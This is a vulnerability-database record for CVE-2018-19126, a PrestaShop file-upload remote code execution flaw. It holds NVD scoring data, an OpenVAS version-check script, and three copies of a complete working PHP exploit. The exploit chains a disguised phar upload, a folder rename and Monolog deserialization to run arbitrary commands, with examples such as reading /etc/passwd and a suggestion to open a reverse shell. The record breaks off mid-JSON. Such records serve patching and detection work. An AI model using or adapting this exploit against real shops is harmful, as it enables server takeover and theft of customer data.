Description
PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.
Related
{"id": "CVE-2018-19126", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2018-19126", "description": "PrestaShop 1.6.x before 1.6.1.23 and 1.7.x before 1.7.4.4 allows remote attackers to execute arbitrary code via a file upload.", "published": "2018-11-09T11:29:00", "modified": "2018-12-12T18:33:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19126", "reporter": "cve@mitre.org", "references": ["https://github.com/PrestaShop/PrestaShop/pull/11286", "https://github.com/PrestaShop/PrestaShop/pull/11285", "http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "https://www.exploit-db.com/exploits/45964/"], "cvelist": ["CVE-2018-19126"], "immutableFields": [], "lastseen": "2022-03-23T15:12:16", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:45964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310112427"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150757"]}, {"type": "zdt", "idList": ["1337DAY-ID-31774"]}], "rev": 4}, "score": {"value": 7.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:45964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112427"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150757"]}, {"type": "zdt", "idList": ["1337DAY-ID-31774"]}]}, "exploitation": null, "vulnersScore": 7.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "prestashop:prestashop", "version": "1.6.1.23", "operator": "lt", "name": "prestashop"}, {"cpeName": "prestashop:prestashop", "version": "1.7.4.4", "operator": "lt", "name": "prestashop"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:prestashop:prestashop:1.6.1.23:*:*:*:*:*:*:*", "versionStartIncluding": "1.6.0.1", "versionEndExcluding": "1.6.1.23", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:prestashop:prestashop:1.7.4.4:*:*:*:*:*:*:*", "versionStartIncluding": "1.7.0.0", "versionEndExcluding": "1.7.4.4", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/PrestaShop/PrestaShop/pull/11286", "name": "https://github.com/PrestaShop/PrestaShop/pull/11286", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/PrestaShop/PrestaShop/pull/11285", "name": "https://github.com/PrestaShop/PrestaShop/pull/11285", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "name": 
"http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/", "refsource": "MISC", "tags": ["Release Notes", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/45964/", "name": "45964", "refsource": "EXPLOIT-DB", "tags": ["Exploit", "Third Party Advisory"]}]}
{"openvas": [{"lastseen": "2020-07-21T20:55:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-19126"], "description": "PrestaShop allows remote attackers to execute arbitrary code via a file upload.", "modified": "2020-06-30T00:00:00", "published": "2018-11-13T00:00:00", "id": "OPENVAS:1361412562310112427", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112427", "type": "openvas", "title": "PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112427\");\n script_version(\"2020-06-30T09:37:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-30 09:37:28 +0000 (Tue, 30 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-13 14:32:22 +0100 (Tue, 13 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-19126\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"PrestaShop 1.7.4.x < 1.7.4.4 & 1.6.1.x < 1.6.1.23 RCE Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_prestashop_detect.nasl\");\n script_mandatory_keys(\"prestashop/detected\");\n\n script_tag(name:\"summary\", value:\"PrestaShop allows remote attackers to execute arbitrary code via a file upload.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The issue exists on the file manager integrated in the text editor component in the Back Office.\n By exploiting a combination of security vunerabilities, an authenticated user in the Back Office could upload a malicious file\n that would then allow him or her to execute arbitrary code on the server.\");\n\n script_tag(name:\"affected\", value:\"PrestaShop 1.7.4.x before 1.7.4.4 and 1.6.1.x before 1.6.1.23.\");\n\n 
script_tag(name:\"solution\", value:\"Update PrestaShop to version 1.7.4.4 or 1.6.1.23 respectively.\");\n\n script_xref(name:\"URL\", value:\"http://build.prestashop.com/news/prestashop-1-7-4-4-1-6-1-23-maintenance-releases/\");\n script_xref(name:\"URL\", value:\"https://github.com/PrestaShop/PrestaShop/pull/11286\");\n script_xref(name:\"URL\", value:\"https://github.com/PrestaShop/PrestaShop/pull/11285\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:prestashop:prestashop\";\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!version = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nif(version_in_range(version:version, test_version:\"1.7.4.0\", test_version2:\"1.7.4.3\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.7.4.4\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nif(version_in_range(version:version, test_version:\"1.6.1.0\", test_version2:\"1.6.1.22\")) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"1.6.1.23\");\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPrestaShop 1.6.x1.7.x - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "title": "PrestaShop 1.6.x1.7.x - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-11T00:00:00", "id": "EXPLOITPACK:F99240EBC893E3EEE65E874A09B8C899", "href": "", "sourceData": "<?php\n/**\n * \n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\n * \n * Chaining multiple vulnerabilities to trigger deserialization via phar.\n *\n * Date:\n * December 1st, 2018\n *\n * Author:\n * farisv\n *\n * Vendor Homepage:\n * https://www.prestashop.com/\n *\n * Vulnerable Package Link:\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\n *\n * CVE :\n * - CVE-2018-19126\n * - CVE-2018-19125\n * \n * Prerequisite:\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\n * - Back Office account (logistician, translator, salesman, etc.).\n * \n * Usage:\n * php exploit.php back-office-url email password func param\n * \n * Example:\n * php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123\n * system 'cat /etc/passwd'\n * \n * Note:\n * Note that the upload directory will be renamed and you can't upload the\n * malicious phar file again if the folder name is not reverted. You might want\n * to execute reverse shell to gain persistence RCE or include the command to\n * rename the folder again in your payload (you need to know the path to the\n * upload directory).\n * \n * FOR EDUCATIONAL PURPOSES ONLY. 
DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\n * \n */\n\nnamespace PrestaShopRCE {\n\n class Exploit {\n private $url;\n private $email;\n private $passwd;\n private $cmd;\n private $func;\n private $param;\n\n public function __construct($url, $email, $passwd, $func, $param) {\n $this->url = $url;\n $this->email = $email;\n $this->passwd = $passwd;\n $this->func = $func;\n $this->param = $param;\n }\n\n private function post($path, $data, $cookie) {\n $curl_handle = curl_init();\n \n $options = array(\n CURLOPT_URL => $this->url . $path,\n CURLOPT_HEADER => true,\n CURLOPT_POST => 1,\n CURLOPT_POSTFIELDS => $data,\n CURLOPT_RETURNTRANSFER => true,\n CURLOPT_COOKIE => $cookie\n );\n \n curl_setopt_array($curl_handle, $options);\n $raw = curl_exec($curl_handle);\n curl_close($curl_handle);\n\n return $raw;\n }\n\n private function fetch_cookie($raw) {\n $header = \"Set-Cookie: \";\n $cookie_header_start = strpos($raw, $header);\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\n return $cookie;\n }\n\n public function run() {\n\n // Login and get PrestaShop cookie\n $data = array(\n 'email' => $this->email,\n 'passwd' => $this->passwd,\n 'submitLogin' => '1',\n 'controller' => 'AdminLogin',\n 'ajax' => '1'\n );\n $cookie = \"\";\n $raw = $this->post('/', $data, $cookie);\n $prestashop_cookie = $this->fetch_cookie($raw);\n\n // Get FileManager cookie\n $data = array();\n $cookie = $prestashop_cookie;\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\n $filemanager_cookie = $this->fetch_cookie($raw);\n\n // Craft deserialization gadget\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\n new \\Monolog\\Handler\\BufferHandler(\n ['current', $this->func],\n [$this->param, 'level' => null]\n )\n );\n\n // Craft malicious phar file\n $phar = new \\Phar('phar.phar');\n $phar->startBuffering();\n 
$phar->addFromString('test', 'test');\n $phar->setStub('<?php __HALT_COMPILER(); ? >');\n $phar->setMetadata($gadget);\n $phar->stopBuffering();\n\n // Change the extension\n rename('phar.phar', 'phar.pdf');\n\n // Cookie for next requests\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\n\n // Upload phar.pdf\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\n $data = array(\n 'file' => $curl_file\n );\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\n\n // Rename image directory to bypass realpath() check\n $data = array(\n 'name' => 'renamed'\n );\n $raw = $this->post(\n '/filemanager/execute.php?action=rename_folder',\n $data,\n $cookie\n );\n\n // Trigger deserialization\n // The '/img/cms/' substring is important to bypass string check\n $data = array(\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\n );\n $raw = $this->post(\n '/filemanager/ajax_calls.php?action=image_size',\n $data,\n $cookie\n );\n\n // Display the raw result\n print $raw;\n\n }\n }\n\n}\n\n/*\n * Based on\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\n*/\nnamespace Monolog\\Handler {\n\n class SyslogUdpHandler {\n protected $socket;\n\n function __construct($param) {\n $this->socket = $param;\n }\n }\n\n class BufferHandler {\n protected $handler;\n protected $bufferSize = -1;\n protected $buffer;\n protected $level = null;\n protected $initialized = true;\n protected $bufferLimit = -1;\n protected $processors;\n\n function __construct($methods, $command) {\n $this->processors = $methods;\n $this->buffer = [$command];\n $this->handler = clone $this;\n }\n }\n\n}\n\nnamespace {\n\n if (count($argv) != 6) {\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\n $hint .= \"salesman@shop.com 54l35m4n123 system 'uname -a'\";\n die($hint);\n }\n\n if (!extension_loaded('curl')) {\n die('Need 
php-curl');\n }\n\n $url = $argv[1];\n $email = $argv[2];\n $passwd = $argv[3];\n $func = $argv[4];\n $param = $argv[5];\n\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\n $exploit->run();\n\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-12-12T10:40:36", "description": "", "published": "2018-12-12T00:00:00", "type": "packetstorm", "title": "PrestaShop 1.6.x / 1.7.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-12T00:00:00", "id": "PACKETSTORM:150757", "href": "https://packetstormsecurity.com/files/150757/PrestaShop-1.6.x-1.7.x-Remote-Code-Execution.html", "sourceData": "`<?php \n/** \n* \n* PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution \n* See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation. \n* \n* Chaining multiple vulnerabilities to trigger deserialization via phar. \n* \n* Date: \n* December 1st, 2018 \n* \n* Author: \n* farisv \n* \n* Vendor Homepage: \n* https://www.prestashop.com/ \n* \n* Vulnerable Package Link: \n* https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip \n* \n* CVE : \n* - CVE-2018-19126 \n* - CVE-2018-19125 \n* \n* Prerequisite: \n* - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4. \n* - Back Office account (logistician, translator, salesman, etc.). \n* \n* Usage: \n* php exploit.php back-office-url email password func param \n* \n* Example: \n* php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123 \n* system 'cat /etc/passwd' \n* \n* Note: \n* Note that the upload directory will be renamed and you can't upload the \n* malicious phar file again if the folder name is not reverted. 
You might want \n* to execute reverse shell to gain persistence RCE or include the command to \n* rename the folder again in your payload (you need to know the path to the \n* upload directory). \n* \n* FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. \n* THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE. \n* \n*/ \n \nnamespace PrestaShopRCE { \n \nclass Exploit { \nprivate $url; \nprivate $email; \nprivate $passwd; \nprivate $cmd; \nprivate $func; \nprivate $param; \n \npublic function __construct($url, $email, $passwd, $func, $param) { \n$this->url = $url; \n$this->email = $email; \n$this->passwd = $passwd; \n$this->func = $func; \n$this->param = $param; \n} \n \nprivate function post($path, $data, $cookie) { \n$curl_handle = curl_init(); \n \n$options = array( \nCURLOPT_URL => $this->url . $path, \nCURLOPT_HEADER => true, \nCURLOPT_POST => 1, \nCURLOPT_POSTFIELDS => $data, \nCURLOPT_RETURNTRANSFER => true, \nCURLOPT_COOKIE => $cookie \n); \n \ncurl_setopt_array($curl_handle, $options); \n$raw = curl_exec($curl_handle); \ncurl_close($curl_handle); \n \nreturn $raw; \n} \n \nprivate function fetch_cookie($raw) { \n$header = \"Set-Cookie: \"; \n$cookie_header_start = strpos($raw, $header); \n$sliced_part = substr($raw, $cookie_header_start + strlen($header)); \n$cookie = substr($sliced_part, 0, strpos($sliced_part, ';')); \nreturn $cookie; \n} \n \npublic function run() { \n \n// Login and get PrestaShop cookie \n$data = array( \n'email' => $this->email, \n'passwd' => $this->passwd, \n'submitLogin' => '1', \n'controller' => 'AdminLogin', \n'ajax' => '1' \n); \n$cookie = \"\"; \n$raw = $this->post('/', $data, $cookie); \n$prestashop_cookie = $this->fetch_cookie($raw); \n \n// Get FileManager cookie \n$data = array(); \n$cookie = $prestashop_cookie; \n$raw = $this->post('/filemanager/dialog.php', $data, $cookie); \n$filemanager_cookie = $this->fetch_cookie($raw); \n \n// Craft deserialization gadget \n$gadget = new 
\\Monolog\\Handler\\SyslogUdpHandler( \nnew \\Monolog\\Handler\\BufferHandler( \n['current', $this->func], \n[$this->param, 'level' => null] \n) \n); \n \n// Craft malicious phar file \n$phar = new \\Phar('phar.phar'); \n$phar->startBuffering(); \n$phar->addFromString('test', 'test'); \n$phar->setStub('<?php __HALT_COMPILER(); ? >'); \n$phar->setMetadata($gadget); \n$phar->stopBuffering(); \n \n// Change the extension \nrename('phar.phar', 'phar.pdf'); \n \n// Cookie for next requests \n$cookie = \"$prestashop_cookie; $filemanager_cookie\"; \n \n// Upload phar.pdf \n$curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf'); \n$data = array( \n'file' => $curl_file \n); \n$raw = $this->post('/filemanager/upload.php', $data, $cookie); \n \n// Rename image directory to bypass realpath() check \n$data = array( \n'name' => 'renamed' \n); \n$raw = $this->post( \n'/filemanager/execute.php?action=rename_folder', \n$data, \n$cookie \n); \n \n// Trigger deserialization \n// The '/img/cms/' substring is important to bypass string check \n$data = array( \n'path' => 'phar://../../img/renamed/phar.pdf/img/cms/' \n); \n$raw = $this->post( \n'/filemanager/ajax_calls.php?action=image_size', \n$data, \n$cookie \n); \n \n// Display the raw result \nprint $raw; \n \n} \n} \n \n} \n \n/* \n* Based on \n* https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/ \n*/ \nnamespace Monolog\\Handler { \n \nclass SyslogUdpHandler { \nprotected $socket; \n \nfunction __construct($param) { \n$this->socket = $param; \n} \n} \n \nclass BufferHandler { \nprotected $handler; \nprotected $bufferSize = -1; \nprotected $buffer; \nprotected $level = null; \nprotected $initialized = true; \nprotected $bufferLimit = -1; \nprotected $processors; \n \nfunction __construct($methods, $command) { \n$this->processors = $methods; \n$this->buffer = [$command]; \n$this->handler = clone $this; \n} \n} \n \n} \n \nnamespace { \n \nif (count($argv) != 6) { \n$hint = \"Usage:\\n php 
$argv[0] back-office-url email password func param\\n\\n\"; \n$hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \"; \n$hint .= \"salesman@shop.com 54l35m4n123 system 'uname -a'\"; \ndie($hint); \n} \n \nif (!extension_loaded('curl')) { \ndie('Need php-curl'); \n} \n \n$url = $argv[1]; \n$email = $argv[2]; \n$passwd = $argv[3]; \n$func = $argv[4]; \n$param = $argv[5]; \n \n$exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param); \n$exploit->run(); \n \n} \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150757/prestashop1617-exec.txt"}], "zdt": [{"lastseen": "2018-12-12T07:56:00", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-12-12T00:00:00", "type": "zdt", "title": "PrestaShop 1.6.x/1.7.x - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-19126", "CVE-2018-19125"], "modified": "2018-12-12T00:00:00", "id": "1337DAY-ID-31774", "href": "https://0day.today/exploit/description/31774", "sourceData": "<?php\r\n/**\r\n * \r\n * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution\r\n * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.\r\n * \r\n * Chaining multiple vulnerabilities to trigger deserialization via phar.\r\n *\r\n * Date:\r\n * December 1st, 2018\r\n *\r\n * Author:\r\n * farisv\r\n *\r\n * Vendor Homepage:\r\n * https://www.prestashop.com/\r\n *\r\n * Vulnerable Package Link:\r\n * https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip\r\n *\r\n * CVE :\r\n * - CVE-2018-19126\r\n * - CVE-2018-19125\r\n * \r\n * Prerequisite:\r\n * - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.\r\n * - Back Office account (logistician, translator, salesman, etc.).\r\n * \r\n * Usage:\r\n * php exploit.php back-office-url email password func param\r\n * \r\n * Example:\r\n * php 
exploit.php http://127.0.0.1/admin-dev/ [email\u00a0protected] 54l35m4n123\r\n * system 'cat /etc/passwd'\r\n * \r\n * Note:\r\n * Note that the upload directory will be renamed and you can't upload the\r\n * malicious phar file again if the folder name is not reverted. You might want\r\n * to execute reverse shell to gain persistence RCE or include the command to\r\n * rename the folder again in your payload (you need to know the path to the\r\n * upload directory).\r\n * \r\n * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.\r\n * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.\r\n * \r\n */\r\n\r\nnamespace PrestaShopRCE {\r\n\r\n class Exploit {\r\n private $url;\r\n private $email;\r\n private $passwd;\r\n private $cmd;\r\n private $func;\r\n private $param;\r\n\r\n public function __construct($url, $email, $passwd, $func, $param) {\r\n $this->url = $url;\r\n $this->email = $email;\r\n $this->passwd = $passwd;\r\n $this->func = $func;\r\n $this->param = $param;\r\n }\r\n\r\n private function post($path, $data, $cookie) {\r\n $curl_handle = curl_init();\r\n \r\n $options = array(\r\n CURLOPT_URL => $this->url . 
$path,\r\n CURLOPT_HEADER => true,\r\n CURLOPT_POST => 1,\r\n CURLOPT_POSTFIELDS => $data,\r\n CURLOPT_RETURNTRANSFER => true,\r\n CURLOPT_COOKIE => $cookie\r\n );\r\n \r\n curl_setopt_array($curl_handle, $options);\r\n $raw = curl_exec($curl_handle);\r\n curl_close($curl_handle);\r\n\r\n return $raw;\r\n }\r\n\r\n private function fetch_cookie($raw) {\r\n $header = \"Set-Cookie: \";\r\n $cookie_header_start = strpos($raw, $header);\r\n $sliced_part = substr($raw, $cookie_header_start + strlen($header));\r\n $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));\r\n return $cookie;\r\n }\r\n\r\n public function run() {\r\n\r\n // Login and get PrestaShop cookie\r\n $data = array(\r\n 'email' => $this->email,\r\n 'passwd' => $this->passwd,\r\n 'submitLogin' => '1',\r\n 'controller' => 'AdminLogin',\r\n 'ajax' => '1'\r\n );\r\n $cookie = \"\";\r\n $raw = $this->post('/', $data, $cookie);\r\n $prestashop_cookie = $this->fetch_cookie($raw);\r\n\r\n // Get FileManager cookie\r\n $data = array();\r\n $cookie = $prestashop_cookie;\r\n $raw = $this->post('/filemanager/dialog.php', $data, $cookie);\r\n $filemanager_cookie = $this->fetch_cookie($raw);\r\n\r\n // Craft deserialization gadget\r\n $gadget = new \\Monolog\\Handler\\SyslogUdpHandler(\r\n new \\Monolog\\Handler\\BufferHandler(\r\n ['current', $this->func],\r\n [$this->param, 'level' => null]\r\n )\r\n );\r\n\r\n // Craft malicious phar file\r\n $phar = new \\Phar('phar.phar');\r\n $phar->startBuffering();\r\n $phar->addFromString('test', 'test');\r\n $phar->setStub('<?php __HALT_COMPILER(); ? 
>');\r\n $phar->setMetadata($gadget);\r\n $phar->stopBuffering();\r\n\r\n // Change the extension\r\n rename('phar.phar', 'phar.pdf');\r\n\r\n // Cookie for next requests\r\n $cookie = \"$prestashop_cookie; $filemanager_cookie\";\r\n\r\n // Upload phar.pdf\r\n $curl_file = new \\CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');\r\n $data = array(\r\n 'file' => $curl_file\r\n );\r\n $raw = $this->post('/filemanager/upload.php', $data, $cookie);\r\n\r\n // Rename image directory to bypass realpath() check\r\n $data = array(\r\n 'name' => 'renamed'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/execute.php?action=rename_folder',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Trigger deserialization\r\n // The '/img/cms/' substring is important to bypass string check\r\n $data = array(\r\n 'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'\r\n );\r\n $raw = $this->post(\r\n '/filemanager/ajax_calls.php?action=image_size',\r\n $data,\r\n $cookie\r\n );\r\n\r\n // Display the raw result\r\n print $raw;\r\n\r\n }\r\n }\r\n\r\n}\r\n\r\n/*\r\n * Based on\r\n * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/\r\n*/\r\nnamespace Monolog\\Handler {\r\n\r\n class SyslogUdpHandler {\r\n protected $socket;\r\n\r\n function __construct($param) {\r\n $this->socket = $param;\r\n }\r\n }\r\n\r\n class BufferHandler {\r\n protected $handler;\r\n protected $bufferSize = -1;\r\n protected $buffer;\r\n protected $level = null;\r\n protected $initialized = true;\r\n protected $bufferLimit = -1;\r\n protected $processors;\r\n\r\n function __construct($methods, $command) {\r\n $this->processors = $methods;\r\n $this->buffer = [$command];\r\n $this->handler = clone $this;\r\n }\r\n }\r\n\r\n}\r\n\r\nnamespace {\r\n\r\n if (count($argv) != 6) {\r\n $hint = \"Usage:\\n php $argv[0] back-office-url email password func param\\n\\n\";\r\n $hint .= \"Example:\\n php $argv[0] http://127.0.0.1/admin-dev/ \";\r\n $hint .= \"[email\u00a0protected] 54l35m4n123 system 
'uname -a'\";\r\n die($hint);\r\n }\r\n\r\n if (!extension_loaded('curl')) {\r\n die('Need php-curl');\r\n }\r\n\r\n $url = $argv[1];\r\n $email = $argv[2];\r\n $passwd = $argv[3];\r\n $func = $argv[4];\r\n $param = $argv[5];\r\n\r\n $exploit = new PrestaShopRCE\\Exploit($url, $email, $passwd, $func, $param);\r\n $exploit->run();\r\n\r\n}\n\n# 0day.today [2018-12-12] #", "sourceHref": "https://0day.today/exploit/31774", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-01-13T05:34:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-11T00:00:00", "type": "exploitdb", "title": "PrestaShop 1.6.x/1.7.x - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 